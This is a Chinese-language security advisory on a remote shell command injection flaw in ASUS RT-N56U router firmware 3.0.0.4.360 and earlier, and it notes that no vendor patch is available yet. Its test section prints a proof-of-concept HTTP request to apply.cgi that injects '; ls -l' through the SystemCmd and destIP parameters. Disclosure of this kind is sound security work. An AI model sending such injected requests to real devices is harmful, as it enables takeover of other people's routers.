发布日期:2013-06-07
更新日期:2013-06-14
受影响系统:
Asus RT-N56U 3.0.0.4.360
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 60431
ASUS RT-N56U是无线宽带路由器。
ASUS RT-N56U 3.0.0.4.360及之前版本对输入过滤不严,存在远程shell命令注入漏洞,成功利用后可使攻击者在受影响设备上下文中上传和执行任意命令。
<*来源:drone
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
GET /apply.cgi?current_page=Main_Analysis_Content.asp&amp;next_page=Main_Analysis_Content.asp&amp;next_host=www.example3.com&amp;group_id=&amp;modified=0&amp;action_mode=+Refresh+&amp;action_script=&amp;action_wait=&amp;first_time=&amp;preferred_lang=EN&amp;SystemCmd=ping+-c+5+%3B+ls+-l&amp;firmver=3.0.0.4&amp;cmdMethod=ping&amp;destIP=%3B+ls+-l+.%2Fuser%2Fcgi-bin%2F&amp;pingCNT=5 HTTP/1.1
Host:
Proxy-Connection: keep-alive
Authorization: Basic ZGVmYXVsdA==
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.94 Safari/537.36
Referer:
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
建议:
--------------------------------------------------------------------------------
厂商补丁:
Asus
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: